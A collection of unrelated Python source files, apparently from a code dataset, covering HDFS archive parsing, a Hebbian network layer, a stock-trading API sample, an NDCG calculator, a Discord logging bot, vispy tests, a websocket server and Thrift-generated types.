HDFS_USER='hdfs'
SIP_ROOT="/heritrix/sips/2015-domain-crawl"
NS={"mets": "http://www.loc.gov/METS/", "premis": "info:lc/xmlns/premis-v2"}
XLINK="{http://www.w3.org/1999/xlink}"
handler = logging.StreamHandler()
formatter = logging.Formatter("[%(asctime)s] %(levelname)s %(filename)s.%(funcName)s: %(message)s")
handler.setFormatter(formatter)
# attach to root logger
logging.root.addHandler(handler)
logging.root.setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel( logging.INFO )
logger.info("INFO LOGGING ENABLED")
logger.debug("DEBUG LOGGING ENABLED")
def get_warc_identifiers(sip):
for item in get_all_identifiers(sip):
if item['mimetype'] == "application/warc":
yield item
def get_all_identifiers(sip):
"""Parses the SIP in HDFS and retrieves FILE/ARK tuples."""
# client = hdfs.InsecureClient(cfg.get('hdfs', 'url'), user=cfg.get('hdfs', 'user'))
client = hdfs.InsecureClient(HDFS_URL, HDFS_USER)
tar = "%s/%s.tar.gz" % (SIP_ROOT, sip)
status = client.status(tar,strict=False)
if status:
# Catch empty packages:
if status['length'] == 0:
logger.warning("Empty (zero byte) SIP package: %s" % tar)
yield None
else:
with client.read(tar) as reader:
t = reader.read()
# Open the package:
tar = tarfile.open(mode="r:gz", fileobj=StringIO(t))
foundMets = False
for i in tar.getmembers():
logger.debug("Examining %s" % i.name)
if i.name.endswith(".xml"):
foundMets = True
xml = tar.extractfile(i).read()
try:
tree = etree.fromstring(xml)
files = {}
n_files = 0
for mfile in tree.xpath("//mets:file", namespaces=NS):
#logger.debug("Found mets:file = %s " % etree.tostring(mfile))
admid = mfile.attrib["ADMID"]
logger.info("Found mets:file admid = %s " % admid)
path = mfile.xpath("mets:FLocat", namespaces=NS)[0].attrib["%shref" % XLINK]
files[admid] = { "path": path, "mimetype": mfile.attrib["MIMETYPE"], "size": mfile.attrib["SIZE"],
"checksum_type": mfile.attrib["CHECKSUMTYPE"], "checksum": mfile.attrib["CHECKSUM"] }
n_files = n_files + 1
if len(files.keys()) != n_files:
logger.error("ERROR, more files than IDs")
n_amdsecs = 0
for amdsec in tree.xpath("//mets:amdSec", namespaces=NS):
#logger.debug("Found mets:amdSec = %s " % etree.tostring(amdsec))
admid = amdsec.attrib["ID"]
logger.info("Found mets:amdSec id = %s " % admid)
oiv = amdsec.xpath("mets:digiprovMD/mets:mdWrap/mets:xmlData/premis:object/premis:objectIdentifier/premis:objectIdentifierValue", namespaces=NS)
if oiv and len(oiv) == 1:
files[admid]['ark'] = oiv[0].text
n_amdsecs = n_amdsecs + 1
logger.debug("Yielding %s" % files[admid] )
yield files[admid]
else:
logger.info("Skipping amdSec ID=%s" % admid)
if n_files != n_amdsecs:
logger.error("ERROR finding all amdSec elements")
except IndexError as i:
logger.error("Problem parsing METS for SIP: %s" % sip)
logger.exception(i)
if not foundMets:
logger.error("No METS XML file found!")
else:
logger.warning("Could not find SIP: hdfs://%s" % tar)
def find_identifiers(output_file):
with open(output_file, 'w') as f:
# client = hdfs.InsecureClient(cfg.get('hdfs', 'url'), user=cfg.get('hdfs', 'user'))
client = hdfs.InsecureClient(HDFS_URL, HDFS_USER)
for (path, dirs, files) in client.walk(SIP_ROOT):
logger.info("Looking at path "+path)
for file in files:
logger.info("Looking at file " + file)
if file.endswith('.tar.gz'):
sip = "%s/%s" % (path, file)
sip = sip[len(SIP_ROOT) + 1:]
sip = sip[:-7]
logger.info("Scanning %s..." % sip)
for waid in get_all_identifiers(sip):
f.write("%s %s\n" % (sip, waid) )
def main():
find_identifiers('identifiers.txt')
# Test
#for waid in get_all_identifiers("weekly-wed2300/20141210230151"):
# print(waid)
#sys.exit(0)
if __name__ == "__main__":
main()
| 1.578125 | 2 |
hebbmodel/fc.py | aimir-lab/hebbian-learning-cnn | 18 | 29060 | <reponame>aimir-lab/hebbian-learning-cnn
import torch.nn as nn
import params as P
import hebbmodel.hebb as H
class Net(nn.Module):
# Layer names
FC = 'fc'
CLASS_SCORES = FC # Symbolic name of the layer providing the class scores as output
def __init__(self, input_shape=P.INPUT_SHAPE):
super(Net, self).__init__()
# Shape of the tensors that we expect to receive as input
self.input_shape = input_shape
if len(input_shape) != 3: self.input_shape = (input_shape[0], 1, 1)
# Here we define the layers of our network
# FC Layers
self.fc = H.HebbianMap2d(
in_channels=self.input_shape[0],
out_size=P.NUM_CLASSES,
kernel_size=(self.input_shape[1], self.input_shape[2]),
competitive=False,
eta=0.1,
        ) # conv kernels with the same height, width, and depth as the input (equivalent to a FC layer), one kernel per class
# Here we define the flow of information through the network
def forward(self, x):
out = {}
# Linear FC layer, outputs are the class scores
fc_out = self.fc(x.view(-1, *self.input_shape)).view(-1, P.NUM_CLASSES)
# Build dictionary containing outputs from convolutional and FC layers
out[self.FC] = fc_out
return out
# Function for setting teacher signal for supervised hebbian learning
def set_teacher_signal(self, y):
self.fc.set_teacher_signal(y)
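
# Minimal forward-pass sketch (a hypothetical usage, assuming PyTorch and the
# project's params module are importable):
#
#   import torch
#   net = Net()
#   x = torch.randn(4, *net.input_shape)   # dummy batch of 4 samples
#   scores = net(x)[Net.CLASS_SCORES]      # shape: (4, P.NUM_CLASSES)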
| 2.3125 | 2 |
sample/sample.py | dogwood008/python-kabusapi | 11 | 29188 | <reponame>dogwood008/python-kabusapi
import kabusapi
url = "localhost"
port = "18081" # for testing; production uses 18080
password = "<PASSWORD>"
# Initial setup / token acquisition
api = kabusapi.Context(url, port, password)
# Print the acquired token
print(api.token)
# Initial setup with an explicit token (no password required)
api = kabusapi.Context(url, port, token='<PASSWORD>')
# Place an order (cash buy)
data = {
"Password": "<PASSWORD>",
"Symbol": 8306, # MUFG
"Exchange": 1,
"SecurityType": 1,
"Side": 2,
"CashMargin": 1,
"MarginTradeType": None,
"DelivType": 1,
"FundType": "02",
"AccountType": 4,
"Qty": 100,
"ClosePositionOrder": None,
"Price": 0,
"ExpireDay": 0,
"FrontOrderType": 10,
}
response = api.sendorder(**data)
# Cancel an order
data = {
"OrderId": "hoge",
"Password": "<PASSWORD>",
}
response = api.cancelorder(**data)
# Buying power (cash)
response = api.wallet.cash()
# Buying power (cash, specific symbol)
data = {
"symbol": 8306,
"exchange": 1,
}
response = api.wallet.cash(**data)
# Buying power (margin)
response = api.wallet.margin()
# Buying power (margin, specific symbol)
data = {
"symbol": 8306,
"exchange": 1,
}
response = api.wallet.margin(**data)
# Market price / order book information
data = {
"symbol": 8306,
"exchange": 1,
}
response = api.board(**data)
# Symbol information
data = {
"symbol": 8306,
"exchange": 1,
}
response = api.symbol(**data)
# Order and execution inquiry
response = api.orders()
# Position inquiry
response = api.positions()
# Register symbols
data = {
"Symbols": [
{"Symbol": 8306, "Exchange": 1, },
{"Symbol": 9433, "Exchange": 1, },
]
}
response = api.register(**data)
# Unregister symbols
data = {
"Symbols": [
{"Symbol": 8306, "Exchange": 1, },
{"Symbol": 9433, "Exchange": 1, },
]
}
response = api.unregister(**data)
# Unregister all symbols
response = api.unregister.all()
| 1.359375 | 1 |
notebook/03-udacityIntroductionToMachineLearning/projects/datasets_questions/utils/read_names.py | EmanuelFontelles/machineLearning | 2 | 29316 | import pandas as pd
import sys
from os import system
sys.path.append('../final_project/')
sys.path.append('../')
def readNames(inputFile='new_poi_names.txt'):
'''
A function to read names data from a file create by a data cache
Returns:
Returns a data frame that contains data from 'poi_names.txt'
'''
#bash_command = 'bash script.sh'
#system(bash_command)
data = pd.read_csv(inputFile, skiprows=2, delimiter=';', header=None, names=['Ans', 'Name'])
    return data
peakinvestigator/actions/run.py | jct197/PeakInvestigator-Python-SDK | 0 | 29444 | <reponame>jct197/PeakInvestigator-Python-SDK
## -*- coding: utf-8 -*-
#
# Copyright (c) 2016, Veritomyx, Inc.
#
# This file is part of the Python SDK for PeakInvestigator
# (http://veritomyx.com) and is distributed under the terms
# of the BSD 3-Clause license.
from .base import BaseAction
class RunAction(BaseAction):
"""This class is used to make a RUN call to the PeakInvestigator
API. See https://peakinvestigator.veritomyx.com/api/#RUN.
It is constructed with a Fluent API because of the number of required
arguments.
"""
def __init__(self, version, username, password, jobID,
response_time_objective):
"""Constructor
"""
super(RunAction,self).__init__(version, username, password)
self._jobID = jobID
self._response_time_objective = response_time_objective
def with_files(self, *args, **kwds):
"""Specify the production and calibration data files using either
function arguments or keywords.
First try keywords. If those are missing, use args[0] for production and
args[1] for calibration, if it exists.
"""
if "production" in kwds:
self._production = kwds["production"]
else:
self._production = args[0]
if "calibration" in kwds:
self._calibration = kwds["calibration"]
elif len(args) == 2:
self._calibration = args[1]
return self
def build_query(self):
query = super(RunAction,self).build_query()
query["Action"] = "RUN"
query["Job"] = self._jobID
query["RTO"] = self._response_time_objective
query["InputFile"] = self._production
if hasattr(self, "_calibration"):
query["CalibrationFile"] = self._calibration
return query
@property
def job(self):
super(RunAction,self).precheck()
return self._data["Job"]
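
# Fluent-API sketch (hypothetical credentials, job ID and file names):
#
#   action = RunAction('5.4', 'joe', 'badge', 'P-1234', 'RTO-24')
#   query = action.with_files(production='example.tab',
#                             calibration='calib.tab').build_query()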
| 1.1875 | 1 |
ingredient_parser/__init__.py | johnwmillr/RecipesAPI | 0 | 29572 | __author__ = 'sheraz'
__all__ = ['parse','normalize']
from ingredient_parser.en import parse
| 0.324219 | 0 |
research/recommend/Fat-DeepFFM/eval310.py | leelige/mindspore | 77 | 29700 | <reponame>leelige/mindspore
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""postprocess."""
import argparse
import os
import numpy as np
from mindspore import Tensor
from src.config import ModelConfig
from src.metrics import AUCMetric
parser = argparse.ArgumentParser(description='CTR Prediction')
parser.add_argument('--result_path', type=str, default="./result_Files", help='Dataset path')
parser.add_argument('--label_path', type=str, default="./CriteoBinary/batch_labels", help='Checkpoint path')
args = parser.parse_args()
def get_acc():
''' get accuracy '''
config = ModelConfig()
batch_size = config.batch_size
auc_metric = AUCMetric()
files = os.listdir(args.label_path)
for f in files:
rst_file = os.path.join(args.result_path, f.split('.')[0] + '_0.bin')
label_file = os.path.join(args.label_path, f)
logit = Tensor(np.fromfile(rst_file, np.float32).reshape(batch_size, 1))
label = Tensor(np.fromfile(label_file, np.float32).reshape(batch_size, 1))
res = []
res.append(logit)
res.append(logit)
res.append(label)
auc_metric.update(*res)
auc = auc_metric.eval()
print("auc : {}".format(auc))
if __name__ == '__main__':
get_acc()
| 1.367188 | 1 |
src/relevancy_measures/calc_NCDG.py | dannycho7/RTP_Latest | 0 | 29828 | <filename>src/relevancy_measures/calc_NCDG.py<gh_stars>0
#!/usr/bin/python3
import sys
import argparse
import math
parser = argparse.ArgumentParser(description='Post-processing after labeling, please put your rating in a file with '
'the same order as in docs.txt, one rating per line.')
parser.add_argument('--doc', required=True, help='path for doc_id_union.txt')
parser.add_argument('--rating', required=True, help='path for your rating file')
parser.add_argument('--result', required=True, help='list of doc_id.txt, separated by colon')
parser.add_argument('--dict', default='phase1/gen_index/vdrelation.txt', help='path for vdrelation.txt')
parser.add_argument('-n', type=int, default=10, help='number of results')
args = parser.parse_args()
v_id_path = args.doc
rating_path = args.rating
result_paths = args.result.split(',')
v_ids = []
ratings = []
data = []
try:
print('Reading vid-did mapping ...')
# read vid-did map from vdrelation.txt
vd_map = {}
with open(args.dict, 'r') as f:
for line in f:
v_id, doc_id = line.split()
vd_map[v_id] = doc_id
# read document ids
with open(v_id_path, 'r') as f:
for line in f:
v_id = line.split()[0]
v_ids.append(v_id)
# read ratings
with open(rating_path, 'r') as f:
for line in f:
rating = int(line.split()[0])
ratings.append(rating)
rating_map = dict(zip(v_ids, ratings))
# read data from each result file
for path in result_paths:
with open(path, 'r') as f:
local_v_ids = []
for line in f:
v_id = line.split()[0]
local_v_ids.append((v_id, rating_map[v_id]))
data.append((path, local_v_ids))
# generate ideal rating order
unique_ratings = {}
for v_id, rating in rating_map.items():
if vd_map[v_id] in unique_ratings:
current_rating = unique_ratings[vd_map[v_id]]
if rating > current_rating:
unique_ratings[vd_map[v_id]] = rating
else:
unique_ratings[vd_map[v_id]] = rating
rating_order = list(unique_ratings.values())
rating_order.sort(reverse=True)
ideal_rating_order = rating_order[:args.n] + [0] * (args.n - len(rating_order[:args.n])) # fix: fill the empty entries with 0s
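    # NDCG recap: DCG@k = sum_{i=1..k} (2^rel_i - 1) / log2(i + 1); IDCG@k is the
    # same sum over the ideal (descending) ratings, and NDCG@k = DCG@k / IDCG@k.
    # Example: ratings [3, 2] give DCG = (2^3-1)/log2(2) + (2^2-1)/log2(3) ~ 7 + 1.893 = 8.893.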
# calculate and generate result
for path, rating_list in data:
title = ' @ '.join(path.split('/')[-3:-1])
print('\nResult for', title, '\n')
print('{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}'.format('Rank','VID','Rating','Relevance','DCG','Ideal Rating','Ideal Relevance','IDCG','NDCG'))
# print('Rank\tRating\tRelevance\tDCG\tIdeal Rating\tIdeal Relevance\tIDCG\tNDCG')
rank = 1
dcg = 0
idcg = 0
filled_rating_list = rating_list + [('Empty', 0)] * (args.n - len(rating_list))
for v_id, rating in filled_rating_list:
relevance = (2 ** rating - 1) / math.log2(1 + rank)
dcg += relevance
ideal_rating = ideal_rating_order[rank - 1]
ideal_relevance = (2 ** ideal_rating - 1) / math.log2(1 + rank)
idcg += ideal_relevance
ndcg = dcg / idcg
print('{:<8}\t{:<8}\t{:<8}\t{:<8.4f}\t{:<8.4f}\t{:<8}\t{:<8.4f}\t{:<8.4f}\t{:<8.4f}'.format(rank, v_id, rating, relevance, dcg, ideal_rating, ideal_relevance,
idcg, ndcg))
rank += 1
except IOError as e:
    print('Cannot open necessary files: %s' % e, file=sys.stderr)
loggerBot.py | jskrist/channelLogger | 0 | 29956 | <reponame>jskrist/channelLogger
import asyncio, discord, json
from discord.ext.commands import Bot
from discord.ext import commands
from tinydb import TinyDB, Query
from tinydb.operations import delete, increment
'''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
SETUP
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'''
# Create a bot
bot = Bot(description="Channel Logger Bot by jskrist#3569", command_prefix="!", pm_help = True)
# Start or connect to a database to log the messages
db = TinyDB('data.json')
# This is a Query object to use when searching through the database
msg = Query()
usr = Query()
'''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
HELPER FUNCTIONS
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'''
# this function returns a list of all the users that have posted to the server
def getPostingUsers():
postingUsers = set();
for item in db:
postingUsers.add(item['authorName'])
return postingUsers
async def addMsgToDB(message):
    # Confirm that the message did not come from this bot, so we don't get into an
    # infinite loop if this bot ever sends out messages itself. Also check that the
    # message is non-empty and that its first character is not a "!" or "]", which
    # would indicate a command.
    if (message.author.id != bot.user.id) and \
       message.content and \
       (message.content[0] != '!') and (message.content[0] != ']'):
# if the mesage content is not in the database yet
if not db.search(msg.content == message.content.lower()):
# Insert the content into the database, along with the name of the user that posted it.
# You could add any other data to the database at this point.
db.insert({'content': message.content.lower(), 'authorName': message.author.name})
'''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
BOT EVENTS AND COMMANDS
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'''
# This function prints a message to the terminal/command window to let you know the bot started correctly
@bot.event
async def on_ready():
print('Bot is up and running.')
# when a message comes into the server, this function is executed
@bot.listen()
async def on_message(message):
await addMsgToDB(message)
# when a message on the server is edited, this function is executed
@bot.listen()
async def on_message_edit(msgBefore, msgAfter):
'''
    Update the database to reflect only the edited message. This could create a state where a
    duplicate message is on the server, but not represented in the database, e.g.
    User1 sends "Hello"
    User2 sends "Hello"
    Database now has {'content': "hello", "authorName": "User1"}
    User1 edits the post to say "Hello World"
    Database now has {'content': "hello world", "authorName": "User1"}
    Should it also contain a copy of the message "hello", since User2 also sent it?
'''
# db.update({'content': msgAfter.content.lower()}, msg.content == msgBefore.content.lower())
'''
Alternatively, you could just add the updated message to the database:
'''
await addMsgToDB(msgAfter)
@bot.command(pass_context=True)
async def printDB(context):
# this command prints out the contents of the database. It should not be used with a large database.
    # the database is saved to a file called data.json (see line 12 of this file).
for item in db:
await bot.send_message(context.message.channel, item)
@bot.command(pass_context=True)
async def stats(context):
    # this command returns the stats for each user; at the moment that is just the number
    # of messages each user has posted, but it could be expanded however you'd like
postingUsers = getPostingUsers()
for user in postingUsers:
userMsgs = db.search(msg.authorName == user)
await bot.send_message(context.message.channel, '{0} has {1} messages'.format(user, len(userMsgs)))
@bot.command(pass_context=True)
async def clearDB_all(context):
    # this command removes all messages from the database
db.purge()
@bot.command(pass_context=True)
async def clearDB_usr(context, User=""):
    # this command removes all messages by the given user from the database
db.remove(usr.authorName == User)
@bot.command(pass_context=True)
async def clearDB_msg(context, Msg=""):
    # this command removes the given message from the database if it exists
db.remove(msg.content == Msg.lower())
'''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
STARTING THE BOT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'''
# this opens up a file named botToken.txt which should contain a single line of text; the bot's token
with open('botToken.txt', 'r') as myfile:
botToken = myfile.read().replace('\n', '')
# start the bot
bot.run(botToken)
| 1.84375 | 2 |
src/dump1090exporter/__init__.py | bgulla/dump1090-exporter | 60 | 30084 | <filename>src/dump1090exporter/__init__.py
from .exporter import Dump1090Exporter
__version__ = "21.10.0"
| 0.196289 | 0 |
webapp/starter/tracker/views.py | jersobh/docker-covidoff | 0 | 30212 | <gh_stars>0
from django.views import View
from django.http import JsonResponse
from tracker.models import Match
from tracker.forms import MatchForm
import json
class MatchView(View):
def put(self, request):
try:
body = request.body.decode('utf-8')
body = json.loads(body)
except json.decoder.JSONDecodeError as ex:
return JsonResponse({ 'error': str(ex) }, status=400)
form = MatchForm(body)
if not form.is_valid():
return JsonResponse(dict(form.errors.items()), status=422)
Match.objects.create(**{
'matcher': form.cleaned_data['matcher'],
'matchee': form.cleaned_data['matchee']
})
return JsonResponse({})
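
# Example request body (a sketch; MatchForm is assumed to validate exactly these
# two fields, based on the cleaned_data lookups above):
#
#   PUT <route wired to MatchView>
#   {"matcher": "alice-phone", "matchee": "bob-phone"}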
| 1.414063 | 1 |
firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefs/TESTS/util/stats.py | davewhiiite/uvc | 1 | 30340 | <filename>firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefs/TESTS/util/stats.py
#!/usr/bin/env python
import re
import sys
import subprocess
import os
def main(*args):
with open('main.cpp') as file:
tests = file.read()
cases = []
with open('template_all_names.txt') as file:
while True:
name = file.readline().strip('\n')
desc = file.readline().strip('\n')
if name == 'test_results':
break
cases.append((name, desc))
with open('template_wrapper.fmt') as file:
template = file.read()
with open('main.cpp', 'w') as file:
file.write(template.format(
tests=tests,
test_cases='\n'.join(
4*' '+'Case("{desc}", {name}),'.format(
name=name, desc=desc) for name, desc in cases)))
if __name__ == "__main__":
main(*sys.argv[1:])
| 1.445313 | 1 |
test.py | lexibank/asjp | 0 | 30468 | <gh_stars>0
def test_valid(cldf_dataset, cldf_logger):
assert cldf_dataset.validate(log=cldf_logger)
def test_parameters(cldf_dataset):
assert len(list(cldf_dataset["ParameterTable"])) == 100
def test_languages(cldf_dataset):
assert len(list(cldf_dataset["LanguageTable"])) > 4000
| 1.28125 | 1 |
vispy/geometry/tests/test_generation.py | chongxi/vispy | 3 | 30596 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import numpy as np
from numpy.testing import assert_array_equal, assert_allclose
from vispy.testing import run_tests_if_main
from vispy.geometry import (create_box, create_cube, create_cylinder,
create_sphere, create_plane)
def test_box():
"""Test box function"""
vertices, filled, outline = create_box()
assert_array_equal(np.arange(len(vertices)), np.unique(filled))
assert_array_equal(np.arange(len(vertices)), np.unique(outline))
def test_cube():
"""Test cube function"""
vertices, filled, outline = create_cube()
assert_array_equal(np.arange(len(vertices)), np.unique(filled))
assert_array_equal(np.arange(len(vertices)), np.unique(outline))
def test_sphere():
"""Test sphere function"""
md = create_sphere(rows=10, cols=20, radius=10, method='latitude')
radii = np.sqrt((md.get_vertices() ** 2).sum(axis=1))
assert_allclose(radii, np.ones_like(radii) * 10)
md = create_sphere(subdivisions=5, radius=10, method='ico')
radii = np.sqrt((md.get_vertices() ** 2).sum(axis=1))
assert_allclose(radii, np.ones_like(radii) * 10)
md = create_sphere(rows=20, cols=20, depth=20, radius=10, method='cube')
radii = np.sqrt((md.get_vertices() ** 2).sum(axis=1))
assert_allclose(radii, np.ones_like(radii) * 10)
def test_cylinder():
"""Test cylinder function"""
md = create_cylinder(10, 20, radius=[10, 10])
radii = np.sqrt((md.get_vertices()[:, :2] ** 2).sum(axis=1))
assert_allclose(radii, np.ones_like(radii) * 10)
def test_plane():
"""Test plane function"""
vertices, filled, outline = create_plane()
assert_array_equal(np.arange(len(vertices)), np.unique(filled))
assert_array_equal(np.arange(len(vertices)), np.unique(outline))
run_tests_if_main()
| 2.078125 | 2 |
communicate.py | IloveKanade/k3cgrouparch | 0 | 30724 | <filename>communicate.py
#!/usr/bin/env python2
# coding: utf-8
import logging
from collections import OrderedDict
from geventwebsocket import Resource
from geventwebsocket import WebSocketApplication
from geventwebsocket import WebSocketServer
import k3utfjson
from k3cgrouparch import account
global_value = {}
logger = logging.getLogger(__name__)
class CgroupArchWebSocketApplication(WebSocketApplication):
def on_open(self):
logger.info('on open')
def on_message(self, message_str):
if message_str is None:
return
try:
self.process_message(message_str)
except Exception as e:
logger.exception('failed to process message: ' + repr(e))
self.send_json({'error': repr(e)})
def on_close(self, reason):
logger.info('on close')
def process_message(self, message_str):
message = k3utfjson.load(message_str)
cmd = message['cmd']
args = message.get('args')
if args is None:
args = {}
result = self.do_cmd(cmd, args)
self.send_json(result)
def do_cmd(self, cmd, args):
if cmd == 'show_account':
return self.show_account(args)
elif cmd == 'get_conf':
return global_value['context']['arch_conf']
else:
return {'error': 'invalid cmd: %s' % cmd}
def show_account(self, args):
return account.show(global_value['context'], args)
def send_json(self, value):
value_str = k3utfjson.dump(value)
self.ws.send(value_str)
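
# Example client messages handled by process_message (JSON over the websocket):
#   {"cmd": "show_account", "args": {...}}  -> account.show(context, args)
#   {"cmd": "get_conf"}                     -> returns context['arch_conf']
# Any other cmd produces {"error": "invalid cmd: <cmd>"}.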
def run(context, ip='0.0.0.0', port=22348):
global_value['context'] = context
WebSocketServer(
(ip, port),
Resource(OrderedDict({'/': CgroupArchWebSocketApplication})),
).serve_forever()
| 1.625 | 2 |
sippy/thrift_stub_dir/thrift/ttypes.py | devatsrs/neon.service | 0 | 30852 | <gh_stars>0
#
# Autogenerated by Thrift Compiler (1.0.0-dev)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:new_style1
#
#from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import sys
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class CallError(object):
NO_ERROR = 0
EXTERNAL_TRANSLATOR_REJECT = 1
BODY_LESS_INVITE = 2
ACCOUNT_EXPIRED = 3
CONNECTION_CAPACITY_EXCEEDED = 4
MALFORMED_SDP = 5
UNSUPPORTED_CONTENT_TYPE = 6
UNACCEPTABLE_CODEC = 7
INVALID_AUTH_CLD_TRANS_RULE = 8
INVALID_AUTH_CLI_TRANS_RULE = 9
INVALID_ACNT_CLD_TRANS_RULE = 10
INVALID_ACNT_CLI_TRANS_RULE = 11
CANNOT_BIND_SESSION = 12
INVALID_DID_CLI_TRANS_RULE = 13
NO_RATE_FOUND = 14
CALL_LOOP_DETECTED = 15
TOO_MANY_SESSIONS = 16
ACCOUNT_IN_USE = 17
HIGH_CALL_RATE_PER_ACCOUNT = 18
HIGH_CALL_RATE = 19
INSUFFICIENT_BALANCE = 20
FORBIDDEN_DESTINATION = 21
NO_CUSTOMER_RATES = 22
LOSS_PROTECTION = 23
ADDRESS_INCOMPLETE = 24
NO_ROUTES = 25
HIGH_CALL_RATE_PER_CONNECTION = 26
INVALID_ASSRT_ID_CLI_TRANS_RULE = 27
DNCL_BLOCKED = 28
_VALUES_TO_NAMES = {
0: "NO_ERROR",
1: "EXTERNAL_TRANSLATOR_REJECT",
2: "BODY_LESS_INVITE",
3: "ACCOUNT_EXPIRED",
4: "CONNECTION_CAPACITY_EXCEEDED",
5: "MALFORMED_SDP",
6: "UNSUPPORTED_CONTENT_TYPE",
7: "UNACCEPTABLE_CODEC",
8: "INVALID_AUTH_CLD_TRANS_RULE",
9: "INVALID_AUTH_CLI_TRANS_RULE",
10: "INVALID_ACNT_CLD_TRANS_RULE",
11: "INVALID_ACNT_CLI_TRANS_RULE",
12: "CANNOT_BIND_SESSION",
13: "INVALID_DID_CLI_TRANS_RULE",
14: "NO_RATE_FOUND",
15: "CALL_LOOP_DETECTED",
16: "TOO_MANY_SESSIONS",
17: "ACCOUNT_IN_USE",
18: "HIGH_CALL_RATE_PER_ACCOUNT",
19: "HIGH_CALL_RATE",
20: "INSUFFICIENT_BALANCE",
21: "FORBIDDEN_DESTINATION",
22: "NO_CUSTOMER_RATES",
23: "LOSS_PROTECTION",
24: "ADDRESS_INCOMPLETE",
25: "NO_ROUTES",
26: "HIGH_CALL_RATE_PER_CONNECTION",
27: "INVALID_ASSRT_ID_CLI_TRANS_RULE",
28: "DNCL_BLOCKED",
}
_NAMES_TO_VALUES = {
"NO_ERROR": 0,
"EXTERNAL_TRANSLATOR_REJECT": 1,
"BODY_LESS_INVITE": 2,
"ACCOUNT_EXPIRED": 3,
"CONNECTION_CAPACITY_EXCEEDED": 4,
"MALFORMED_SDP": 5,
"UNSUPPORTED_CONTENT_TYPE": 6,
"UNACCEPTABLE_CODEC": 7,
"INVALID_AUTH_CLD_TRANS_RULE": 8,
"INVALID_AUTH_CLI_TRANS_RULE": 9,
"INVALID_ACNT_CLD_TRANS_RULE": 10,
"INVALID_ACNT_CLI_TRANS_RULE": 11,
"CANNOT_BIND_SESSION": 12,
"INVALID_DID_CLI_TRANS_RULE": 13,
"NO_RATE_FOUND": 14,
"CALL_LOOP_DETECTED": 15,
"TOO_MANY_SESSIONS": 16,
"ACCOUNT_IN_USE": 17,
"HIGH_CALL_RATE_PER_ACCOUNT": 18,
"HIGH_CALL_RATE": 19,
"INSUFFICIENT_BALANCE": 20,
"FORBIDDEN_DESTINATION": 21,
"NO_CUSTOMER_RATES": 22,
"LOSS_PROTECTION": 23,
"ADDRESS_INCOMPLETE": 24,
"NO_ROUTES": 25,
"HIGH_CALL_RATE_PER_CONNECTION": 26,
"INVALID_ASSRT_ID_CLI_TRANS_RULE": 27,
"DNCL_BLOCKED": 28,
}
class TransactionRecordType(object):
CALLS = 1
CDRS = 2
CDRS_CONNECTIONS = 3
CDRS_CUSTOMERS = 4
CDRS_DIDS = 5
CDRS_CONNECTIONS_DIDS = 6
SURCHARGES = 7
COMMISSIONS = 8
UPDATE_ACCOUNT_BALANCE = 9
UPDATE_CUSTOMER_BALANCE = 10
UPDATE_VENDOR_BALANCE = 11
UPDATE_PLAN_MINUTES = 12
QUALITY_STATS = 13
CALLS_SDP = 14
CDRS_CUSTOMERS_DIDS = 15
_VALUES_TO_NAMES = {
1: "CALLS",
2: "CDRS",
3: "CDRS_CONNECTIONS",
4: "CDRS_CUSTOMERS",
5: "CDRS_DIDS",
6: "CDRS_CONNECTIONS_DIDS",
7: "SURCHARGES",
8: "COMMISSIONS",
9: "UPDATE_ACCOUNT_BALANCE",
10: "UPDATE_CUSTOMER_BALANCE",
11: "UPDATE_VENDOR_BALANCE",
12: "UPDATE_PLAN_MINUTES",
13: "QUALITY_STATS",
14: "CALLS_SDP",
15: "CDRS_CUSTOMERS_DIDS",
}
_NAMES_TO_VALUES = {
"CALLS": 1,
"CDRS": 2,
"CDRS_CONNECTIONS": 3,
"CDRS_CUSTOMERS": 4,
"CDRS_DIDS": 5,
"CDRS_CONNECTIONS_DIDS": 6,
"SURCHARGES": 7,
"COMMISSIONS": 8,
"UPDATE_ACCOUNT_BALANCE": 9,
"UPDATE_CUSTOMER_BALANCE": 10,
"UPDATE_VENDOR_BALANCE": 11,
"UPDATE_PLAN_MINUTES": 12,
"QUALITY_STATS": 13,
"CALLS_SDP": 14,
"CDRS_CUSTOMERS_DIDS": 15,
}
class NullInt64(object):
"""
Attributes:
- v
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'v', None, None, ), # 1
)
def __init__(self, v=None,):
self.v = v
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.v = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
